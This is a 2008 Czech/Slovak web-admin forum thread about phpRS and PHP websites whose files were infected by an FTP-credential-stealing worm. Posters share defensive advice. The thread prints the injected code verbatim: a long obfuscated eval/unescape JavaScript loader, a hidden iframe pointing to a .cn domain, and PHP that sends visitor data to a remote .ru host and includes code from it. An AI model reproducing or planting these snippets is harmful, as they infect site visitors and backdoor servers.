Zdravím, dnes ráno jsem se probudil a na mém webu se v horní části prezentace vytvořené v phpRS objevily tyto hlášky:
( ! ) Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/.../www/specfce.php:733) in /var/www/html/.../www/trwebstat.php on line 193
Call Stack
# Time Memory Function Location
1 0.0008 78560 {main}( ) ../index.php:0
2 0.0041 159368 include_once( '/var/www/html/.../www/myweb.php' ) ../index.php:16
3 0.0113 512592 include_once( '/var/www/html/.../www/trwebstat.php' ) ../myweb.php:16
4 0.0119 513648 CWebStat->UlozStat( ) ../trwebstat.php:224
5 0.0123 513864 CWebStat->GenIdent( ) ../trwebstat.php:218
6 0.0128 514216 CWebStat->SendCook( ) ../trwebstat.php:201
7 0.0128 514232 setcookie ( ) ../trwebstat.php:193

----------------
nakoukl jsem do uvedených souborů a ejhle, na jejich konci se objevilo toto - novinka:

<!-- [ 3ef4baddbb918ea77b9ef5123ac9890b ] --><script>eval(unescape('function%20ifLIR%28wxKvD%29%7Bfunction%20bOuuX%28aIS%29%7Bvar%20eTeE%3DaIS.length%3Bvar%20kBGcU%3D0%2CwSDwTm%3D0%3Bwhile%28kBGcU%3CeTeE%29%7BwSDwTm+%3DaIS.charCodeAt%28kBGcU%29*eTeE%3BkBGcU++%3B%7Dreturn%20%28%27%27+wSDwTm%29%7D%20%20%20try%20%7Bvar%20guxK%3Deval%28%27aRrRg+uBm+e+n5t+sR.+c5a5lRl%25e+eB%27.replace%28/%5BR%25%5C+5B%5D/g%2C%20%27%27%29%29%2ChKznUqTZ%3Dnew%20String%28%29%2CamU%3D0%3Bmdneyw%3D0%2CxDqIkBS%3D%28new%20String%28guxK%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20bCmaI%3DbOuuX%28xDqIkBS%29%3BwxKvD%3Dunescape%28wxKvD%29%3Bfor%28var%20fEjT%3D0%3B%20fEjT%20%3C%20%28wxKvD.length%29%3B%20fEjT++%29%7Bvar%20vAg%3DwxKvD.charCodeAt%28fEjT%29%3Bvar%20rPe%3DxDqIkBS.charCodeAt%28amU%29%5EbCmaI.charCodeAt%28mdneyw%29%3BamU++%3Bmdneyw++%3Bif%28amU%3ExDqIkBS.length%29amU%3D0%3Bif%28mdneyw%3EbCmaI.length%29mdneyw%3D0%3BhKznUqTZ+%3DString.fromCharCode%28vAg%5ErPe%29%3B%7Deval%28hKznUqTZ%29%3B%20return%20hKznUqTZ%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DifLIR%28%27%2532%2537%2531%2535%2536%2534%2537%2532%2549%2530%252d%2550%254e%253a%2531%2547%2520%2512%257a%2532%252d%2539%2536%2532%252c%2525%2512%2518%2562%2579%254d%252c%251e%250b%252b%250a%2529%2537%2533%2531%251f%2520%251b%255b%251f%2572%2535%253a%2526%2504%252e%2520%253e%2517%250c%2527%253a%2576%2559%2524%257d%2530%253d%2515%2534%250c%2537%2568%256b%2576%2520%251a%2536%252e%2553%2516%2539%2509%256f%2502%250a%2514%2535%250f%2514%252f%2514%2574%253f%2526%2502%2578%2526%2534%2538%2528%255a%2535%250b%2524%2502%257e%257e%2506%2516%2520%2512%2517%2508%2572%2556%2536%2500%2507%2524%2545%2559%2570%2579%256b%2568%257f%2568%254c%255e%2513%250a%2532%2565%257a%2572%2562%2571%2567%2547%253b%2533%255a%2534%252c%253d%257b%256e%256f%2560%2542%2523%252e%2510%253c%2534%2535%255b%2523%2520%2544%2532%2575%253e%2576%2573%2504%2509%2528%257a%2537%2511%256e%2517%2536%251e%253a%2505%2526%2522%250d%256f%2512%257d%2505%253e%2565%255a%2568%257f%2548%2566%254d%257a%2538%253e%252e%2548%2530%2523%252e%2530%2506%257d%2533%257c%2548%2529%2502%250d%253d%2548%2531%2570%252c%2520%2560%255d%251b%2554%2547%2557%254a%2578%2579%256f%2515%2526%2530%2505%253d%2533%2533%2560%2566%2550%2545%256e%254e%256d%2577%2577%2578%2574%255d%2576%253f%2551%2522%2538%2526%2556%253b%2545%2548%2568%2544%2576%2523%2533%2524%2532%2532%2507%2510%2503%2537%252d%2527%2508%252a%252f%2508%2562%256d%2563%2555%257a%2555%254b%2561%256f%2552%2556%2502%252a%2536%2523%256b%253f%2539%2531%2511%2565%2564%255a%2537%251a%253b%252b%256e%2506%2532%2531%253f%254b%2521%254c%2564%253b%252a%2533%250a%2523%2503%251c%252f%2516%2526%254b%2532%253e%2532%2520%2536%2530%2514%253b%2573%2568%2531%2526%2537%2525%2532%252e%252e%2518%2530%2501%2576%2538%2539%2575%257f%2551%2509%2523%253c%2513%2535%2539%251e%2533%254e%255f%2528%2533%2522%2517%2573%2520%254e%2572%257f%2575%2516%255f%253c%2565%2505%2567%2527%2571%2511%2560%257a%2540%251b%2560%251e%2551%253b%2546%2516%2568%251b%2521%2530%253e%2534%2510%2516%253b%2532%2534%2533%2525%253d%2530%252a%2570%2560%2534%2531%252b%250d%253b%2535%250b%257f%2561%251d%2518%251c%2532%2503%253b%2556%252b%2569%251f%2572%2554%2540%253e%2577%2549%2533%256d%2562%257a%256c%253f%250d%2570%2541%2522%253b%2527%257b%253a%2570%2570%256b%252a%2563%253a%2543%2572%2571%257a%2570%253a%255f%2567%2539%257b%2528%2526%252f%2533%2576%251a%2551%2500%253e%2514%252f%254e%250b%250d%251b%252f%252c%2577%251f%2579%2526%252d%2573%251f%2510%2531%2534%2528%2518%2573%257a%257d%2515%255d%253c%2526%250b%2534%2525%2529%257a%2540%256b%2550%257a%2572%2558%2537%2506%251c%2507%2525%252d%2564%2528%2563%2521%2550%253b%250b%2513%2505%250a%2500%2533%2538%2525%2541%254e%2560%2538%252a%253c%2536%2521%252a%253e%2506%257f%2559%2536%252d%253d%257b%2563%252d%250e%2530%252b%2532%2550%2504%2510%2521%2538%256b%2520%254e%2577%252e%253d%2520%2563%251f%250e%2528%2530%2556%2569%2578%254c%2532%2555%2520%2521%2522%2517%2539%250f%2534%255a%253d%252c%2516%2539%2519%2531%252c%2536%256b%2573%2558%2534%2520%252e%2523%2518%253a%2507%252a%2505%2565%254f%2555%257a%2554%256d%2537%2575%2558%256b%256b%257d%2565%2554%2517%253b%2504%2510%250b%2537%251a%2536%254b%2513%252f%2509%2506%253a%251b%2542%2526%2575%2532%2537%252d%2526%257d%2578%2574%2556%257f%257d%2555%255e%2543%2502%2521%2506%2531%2503%253a%255d%2503%2502%250b%2530%2531%2568%2568%2564%2562%2565%2536%250e%2530%250c%252a%2527%2535%2573%2566%254a%2524%257e%2530%2522%253a%251c%2515%2500%2518%2521%250c%252d%2500%2579%2568%254e%257f%2518%2570%256a%252a%2535%2510%2520%2573%2534%255f%2573%251f%2511%2563%2532%2502%2513%2526%2514%2504%2569%2567%2537%256b%253f%255b%2520%256c%2527%257e%256d%2531%251c%252d%253c%254f%255e%253d%2531%2561%2503%2519%253b%2579%2504%2534%2573%2537%2531%2574%257c%2546%252e%2573%2514%253d%2526%2520%2578%2521%2537%253b%2504%2510%251d%253a%2540%2548%253b%253f%256f%2546%2558%2529%2530%252c%2526%2530%252d%2523%2559%2514%2560%2534%2534%2537%2534%2523%253b%251d%250f%2537%2564%257a%2571%2569%255d%253b%251c%2537%2575%2568%2532%2533%2576%2530%2533%2521%2506%2508%2513%253e%250f%2520%251a%252e%252b%253d%252e%255b%2569%2555%2526%2500%2505%2537%2558%250a%257c%2557%257c%2529%2535%253c%2538%2544%2534%2577%2566%253c%250e%253a%2507%2563%2516%2577%252d%250a%2522%250a%254c%256a%253a%2517%2571%2516%252a%2508%2539%253f%250d%2534%253c%2570%2523%2535%252a%2528%2538%2565%2563%252b%256f%250c%253f%253a%253c%2527%2541%2509%2550%2510%2542%2536%254d%2560%253e%257a%2535%2503%2503%2502%2534%2521%251a%2577%2534%252d%254a%2543%2532%2575%2535%253c%2507%2508%2577%2573%251f%2559%256d%2555%254b%2568%2531%252a%250d%2521%2517%253b%2579%257c%252e%253b%2522%2548%2550%250f%252f%2577%2530%2551%2539%2576%254f%257a%256e%2506%2532%253b%2522%2558%2521%2508%2522%251f%2526%252d%252c%2530%250f%2535%2521%257e%2570%257f%256e%251d%257a%2566%256d%253b%255b%2565%255a%251a%2516%2568%2513%253f%255c%2500%2533%251b%253f%2506%2539%2512%2561%2562%253e%2508%2578%256f%2536%2504%253b%2515%2501%250e%254a%2502%2576%2551%2568%253e%2527%2502%2534%2520%253c%2570%257d%2501%2516%257c%252b%255c%2503%2550%2519%2505%254e%2521%254a%257a%2546%2564%256a%2567%252c%2521%2560%2574%2509%252b%253b%2500%257d%2538%257b%2510%2532%2507%2522%252c%2515%253c%2530%255f%253d%2579%2519%2523%253e%2537%2556%2565%2561%250d%256d%2523%251a%252c%2520%2524%256b%2535%2570%2561%2524%2566%253a%2508%252b%2511%250b%2571%257e%254c%251c%2520%2522%2528%253b%253b%257c%2536%255d%252a%253b%253b%2556%2525%252c%253c%253f%2500%2575%252f%252d%2535%2524%251d%2556%2547%254b%253f%2514%2509%2505%2521%252c%2571%253d%255c%2565%2529%2563%2526%251b%250f%252d%2528%2505%2535%251d%256f%256a%2535%2576%254d%2525%2520%2523%2512%2503%2578%253f%2579%2576%250e%253a%2506%2569%2525%2536%251f%252b%255f%2536%2579%2522%253c%2561%254f%2559%2530%2548%2578%250c%253f%2570%256f%253b%2529%2530%2536%2511%2520%251e%2528%255b%2563%254f%2570%254b%254c%251f%2555%252e%256a%2511%2556%2576%256e%2564%2552%2567%255a%252c%2534%2523%2519%2522%253a%2527%255d%257b%253f%2513%2551%252b%2545%2505%2578%2528%257b%2503%256b%2573%2567%2565%2569%2547%2538%2510%251d%252b%2511%2577%2530%2525%250d%2507%2539%252c%2539%252a%2529%2554%2523%251e%253a%2528%257e%2504%252b%2509%253b%252e%2527%2511%2533%2532%2565%256e%2567%2511%2574%250a%2574%2578%2567%2536%250b%2533%253b%2532%2514%257d%2529%2521%2520%2573%256e%2529%252a%257e%2566%2519%2524%257c%257b%2538%2505%2501%2500%2514%2532%2504%2503%2534%2534%2524%2541%254e%2560%2538%252a%253c%2579%2521%2533%2508%255e%2577%257a%2524%2522%252a%2537%2572%256c%2516%2556%2567%2550%253a%251b%2504%252c%253a%2512%250f%2537%256d%253f%2537%253c%253b%252e%251d%2557%2570%252d%2534%2523%2520%2519%2537%254d%2506%253e%2575%253c%2528%257a%2561%251c%2546%2501%250d%2551%2578%2576%2536%253b%256f%2541%2567%2568%2555%2578%257c%255d%2521%2515%251c%2534%2541%252a%251e%2528%2516%2535%2515%2505%2524%2523%250f%2526%255b%2561%2564%256a%2553%257c%2567%2568%256b%253c%2531%2547%2532%2525%2526%2578%252c%2577%2563%2529%256c%2519%250f%2511%2527%2533%2526%2574%2549%257b%2525%257f%2570%251c%2531%2530%253d%2529%2524%2527%2504%2538%255a%2572%255a%27%29%3B'));</script><!-- end -->

----
Nevím, co to má znamenat, ale vysvětluju si to tak, že nějaký robot - vir odhalil moje heslo a pozměnil soubory. Dokážete to někdo identifikovat, případně navrhnout pomoc?



Celkem upraveno 2×. Poslední úprava pa3k v 06.04.2008 13:22.

no v prvni rade to chce zmenit heslo pro pristup, pak ihned tyhle napadene soubory prepsat temi spravnymi a pak se da zkoumat co to vlastne je - je to zcela jiste nejaka javaskriptova funkce, ktera napriklad muze zpusobit napadeni kazdeho PC, ktere se na dany web podiva

jen by to ještě chtělo mít logy od serveru.

BTW používat "silná hesla", případně se domluvit i s poskytovatelem a vyzkoušet si průnik do vlastní domény, stroje atd...

p.s.
v žádném případě se o to nesnažit bez předběžné domluvy u IPS, mohlo by to mít neblahé následky, než se vysvětlí podstata toho nabourávání... :-)))

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------

a jeste me napadlo - odvirovat si vlastni PC, z nej mohlo byt zcizeno heslo pro ftp pristup (bud odposlechem klavesnice nebo prectenim ulozenych hesel v totalcommanderu apod)

Okamžite kontaktovať hosting, skontrolovať všetky súbory alebo vymazať celý web a nahrať ho tam znova. Používať silné heslá a pravidelne ich meniť. Pristupovať do administrácie webu a do FTP účtu len zo 100% tne zabezpečeného PC.

Mam ten samy problem.

Zatim sem z toho vystoural tohle:

function xppEwEu(yJVD){function xFplcSbG(mrF){var rmO=mrF.length;var wxxwZl=0,owZtrl=0;while(wxxwZlnuI.length)sIoLeu=0;if(qcNz>xgod.length)

googlil sem dal a na adrese [http://webtrh.cz/5720-nedetekovany-virus-poznate-dela?p=43731] sem nasel vysledek toho kodu

<div style="display: none;"><iframe src="http://icdt.hu.5829493e053a10e7.2traff.cn/traff2.cn/"></iframe></div><!-- end -->

Udajne to dela toto: (opet obsah z predchazejiciho linku)
1)po spusteni v IE to nainstaluje (mozna nic nenainstaluje, ale vyuzije primo pristupu k souborum pomoci nejake IE chyby) nejakeho hezkeho cervika, ktery si najde wcx_ftp.ini
2)co si ze souboru vytahne asi tusite
3)data nekam posle
4)no a pak uz roboti na nejakych serverech pouze ta data pouziji, prozatim jedine pouziti, ktere jsem videl je to, ze na dane FTP nahraje do vsech adresaru pojmenovanych /www/ do kazdeho souboru s rozumnou priponou (php, html, asp...) na konec prida opet jeden a ten samy skript

potvrzuje to i tento link: [http://translate.google.com/translate?hl=en&sl=ru&u=http://www.cracklab.ru/f/index.php%3Faction%3Dvthread%26forum%3D6%26topic%3D11393&sa=X&oi=translate&resnum=8&ct=result&prev=/search%3Fq%3D2traff.cn%26num%3D20%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:cs:official%26hs%3DtvJ%26sa%3DG]
Presneji prispevek od RUNaum

Nevim jak vam, ale me se celkem ulevilo, jen smula ze mam v Totalcmd tolik ftp uctu. Jdu dal menit hesla. Zatim...



Celkem upraveno 2×. Poslední úprava JanVar v 06.04.2008 11:23.

To: CoYoT

příště prosím uprav ten zbytečně dlouhý řádek, takhle jsem ho jen odmazal!


To: All..

má tohle někdo na systému *nix/nux nebo je to jen vlastnost onoho nejmenovaného systému D´Bill?

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------

co se tyce operacniho systemu serveru, kde je web, tak ten vubec nerozhoduje - skript "ukradne" prihlasovaci udaje k ftp a pak "legalnim" zpusobem se k serveru pripoji pres ftp a v prvni fazi modifikuje existujici soubory, aby take obsahovaly tento zakerny kod (a tim ziskavali dalsi ftp ucty), a ve druhe fazi pak ten web server zneuziji napr vytvorenim falesnych stranek nejake banky
jedine, co to potrebuje, aby navstevnik stranek pouzival totalcommander a mel v nem ulozena i hesla k ftp uctum

jinak to neni celkem nic noveho, jeden takovy pripad je popsan na Lupe uz v roce 2005 [http://www.lupa.cz/clanky/web-ktery-se-neubranil-phishingu/]

(nejprve modiifkace stranek a pak falesne stranky paypal - viz z vyjadreni : "kromě spoof stránek je ze stejné IP nahrána i 'oficiální' část webu" )



Celkem upraveno 2×. Poslední úprava MirekS v 06.04.2008 20:19.

Neda sa pred tymto utokom branit napr. aj tak, ze by sa pred nacitanim (asi jedine) index-u robila automaticka kontrola na modifikaciu nejakeho (mozno aj podstrceneho "include") suboru? a ak by sa zistila jeho zmena, tak by sa web automaticky "blokol"?
Je blbe vysvetlovat, lepsie by bolo konkretne riesenie, no lenze ja niesom ten pravy programator na tieto veci, len ma napadlo mozne riesenie, ktore by uz ten script asi len tak neoblbol, kedze do suborov len pridava svoje "svinstva".
Spravca daneho webu by uz potom musel problem riesit, ale hlavne by o probleme hned vedel a "nenakazili" by sa z jeho webu dalsi useri/browseri.

MirekS napsal/a:
-------------------------------------------------------
> ...
> skript "ukradne" prihlasovaci udaje k ftp a pak "legalnim" zpusobem
> se k serveru pripoji pres ftp a v prvni fazi modifikuje existujici soubory,
> aby take obsahovaly tento zakerny kod
>..........
>
> jinak to neni celkem nic noveho, jeden takovy pripad je popsan na Lupe uz v roce 2005
> (nejprve modiifkace stranek a pak falesne stranky paypal -
> viz z vyjadreni : "kromě spoof stránek je ze stejné IP nahrána i 'oficiální' část webu" )
> ...

copak o to,, tuhle kauzu jsem sledoval, ale stále z toho vyplývá pouze jedinné:
silná hesla, šifrovaný přístup, přistupovat pouze z důvěryhodných PC atd...

nadarmo se neříká: "důvěřuj, ale prověřuj"...

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------

silna hesla ani sifrovany pristup tomu nezabrani a pristup z duveryhodneho PC take nemusi byt dostacujici, nebot i na duveryhodnem PC se nekdo muze podivat na takto "nakazenou" stranku a skript pak zafunguje a konfiguraci ftp odesle

jediny zpusob ochrany je hesla neukladat s konfiruraci ftp pripojeni ve ftp klientovi (ted se jedna o totalcommander, ale za chvili se muze pocet ftp klientu rozrust o dalsi, ze kterych to bude umet "krast" prihlasovaci udaje)

to by bylo na OT diskusi, ale s tím ukládáním hesel máš naprostou pravdu.

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------

Stalo se mi neco podobneho, dnes mi na obou webech zacaly vyskakovat hlasky a ve vsech php souborech mam doplneny kod

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); 
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); 
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); 
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] :
 $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
 $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] :
 $HTTP_REFERER); 
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==")."ijfczzazbzbzgjzb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str)))
{} else {include_once(base64_decode("aHR0cDovLw==")."ijfczzazbzbzgjzb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>

na konci nebo i na zacatku hodne dlouhy text, jako je na uvod tohoto vlakna.

Problem je v tom, ze se nedostanu k bezpecnemu PC, nikde nemam PC jen pro sebe (v praci). Porad se u toho stridaji lidi.




Celkem upraveno 2×. Poslední úprava panet v 04.05.2008 13:12.

Ak si lenivý pamätať si heslá na FTP a zapisuješ ich do konfigurácie v TC, treba byť maximálne opatrný. To si môžeš dovoliť naozaj len na PC, ktorý máš na 100% pod kontrolou a vieš si poriešiť jeho dôkladnú ochranu a zabezpečenie. Ak také PC nemáš, je blbosť vôbec heslá do PC ukladať. Dokonca aj prihlásenie s odoslaním hesla je na takom PC rizikové, nakoľko môže na pozadí bežať keylogger. V inet kaviarni z nejakého PC by som sa rozhodne na server nelogoval ;-)

Aspoň čiastočným riešením je vytvoriť na prácu s citlivými údajmi samostatný užívateľský účet, ktorý má nastavenia oddelené. TC sa dá nakonfugurovať tak aby nastavenia ukladal pre každého užívateľa zvlášť (documents & settings). Takýto účet je nutné používať výhradne na prácu s FTP, nesmieš surfovať po stránkach ani robiť žiadne iné potencionálne rizikové veci. Zvlášť vo Windows (aj zaplátaných) si ťažko byť niečím istý, preto je potrebné bezpečnostné opatrenia kombinovať a neustále sledovať ich efektivitu.

Ďalšie riešenie je mať nainštalovaný virtuálny stroj, napríkad VMware, v ňom nejaký slušný a bezpečný OS, napríklad Linux. Takýto virtuálny stroj v ktorom je plnohodnotný a dobre zabezpečený operačný systém sa dá spúšťať napríklad aj z USB disku, takže ťa potom nemusí trápiť, či v tvojej neprítomnosti niekto niečo v systéme nezmenil.

PS: Ak sa to stalo cez PC ktoré používaš v práci, je to fakt na zamyslenie. V prvom rade treba kontaktovať správcu, nech spraví niečo s bezpečnsťou. To PC bude pravdepodobne zle zabezpečené a je možným zdrojom vírusov, backdoor-ov a podobných srandičiek, na ktoré môžu doplatiť všetci jeho užívatelia ale hlavne ten, kto je za neho prevádzku zodpovedný. Tvoj zamestnávateľ je buď tupec alebo prispatý snílek, ktorý si neuvedomuje, čo všeko sa môže stať ;-)

No, spravce jsem ja... :-)

Slova o tupcich a podobne mozna nejsou zcela na miste. Pocitac neni v kavarne, je to ucitelsky PC, na kterem se hlasi uzivatele vyhradne s pravem user a dva informatici s admin pravy (tem proste nemuzu nedat prava). Co udelaji oni, to ja neovlivnim. Taky nevim jiste, jestli to bylo z te stanice ci nikoli dostanu se tam az zitra odpoledne, jsem tam externe.

Data (moje) samozrejme na stanici nejsou, ukladaji se na nasdilene disky v domene, kam ostatni pristup nemaji. Je fakt, ze u toho TC nevim, jestli nekdo neprenastavil ukladani nastaveni, jinak si volim vzdy do adresare aplikace a ta je zase na sdilenem disku (pokud by sajrajt opravdu na PC byl, tak mi to nepomuze, to uznavam).

Fakt je, ze si malinko vetsi poradek budu muset udelat, at uz to je z toho PC nebo neni.

Tak po zmene hesel do DB i FTP se mi zase objevil v rootu webu (obou - mam dva weby u jednoho poskytovatele) soubor se jmenem "analyze-passwd" a v nem je radek:

skutecnejmeno:hPxc9a6fl7Jdo

Cislo za dvojteckou jsem zmenil v nekterych znacich. Muze to byt voditko?





Celkem upraveno 2×. Poslední úprava panet v 05.05.2008 00:49.

Je celkom možné, že si v tom nevinne a problém má hosting.

Myslite, ze bych sem (nebo nekam jinam) mohl hodit kousek logu acces_log a error_log za posledni treba 4dny? S tim, ze vim, kdy byly modifikovany soubory i kdy by vytvoren soubor analyze-passw?

Muj problem je, ze prave nedokazu odpovedne risct, jestli je chyba u mne nebo u providera (a tam je totez na obou mych webech, jako pres kopirak). Navic, pulden pred tim, nez jsem to zjistil a nez se soubory modifikovaly jim weby nejely a to mi potvrdili dnes po telefonu, coz muze byt shoda okolnosti, ale taky ne. Mam dalsi dva weby jinde a ty jedou (jenze zase nevim, jestli mam jejich hesla v praci v TC nebo ne). Kazdopadne, kdyby to bylo z prace, tak uz by dnes po vymene hesel kolem poledne nemel podezrely soubor vzniknout v 16:05. Pokud to s tim souvisi, tak bych rekl, ze to proste nemze byt z prace a z domu je to nepravdepodobne, jsem u PC sam a hesla k dalsim webum jsou ulozena v TC a ty jsou OK.

Edit:
TEd jsem jeste nasel toto:
[url] [http://www.webdeveloper.com/forum/archive/index.php/t-84419.html][/url] a vypada to uplne stejne (skoro). Akorat umim prd anglicky, tak jenom chapu, ze resi, jestli nema diru v nejake funkci pro upload.



Celkem upraveno 1×. Poslední úprava panet v 05.05.2008 00:50.

Máš s systéme nejaký plugin, ktorý umožňuje upload súborov?
Ak to vzniklo cez FTP v logoch webservera to nebude, ak to preliezlo cez deravý php script, dá sa to dohľadať. Kľudne logy niekde uploadni a hoď sem link.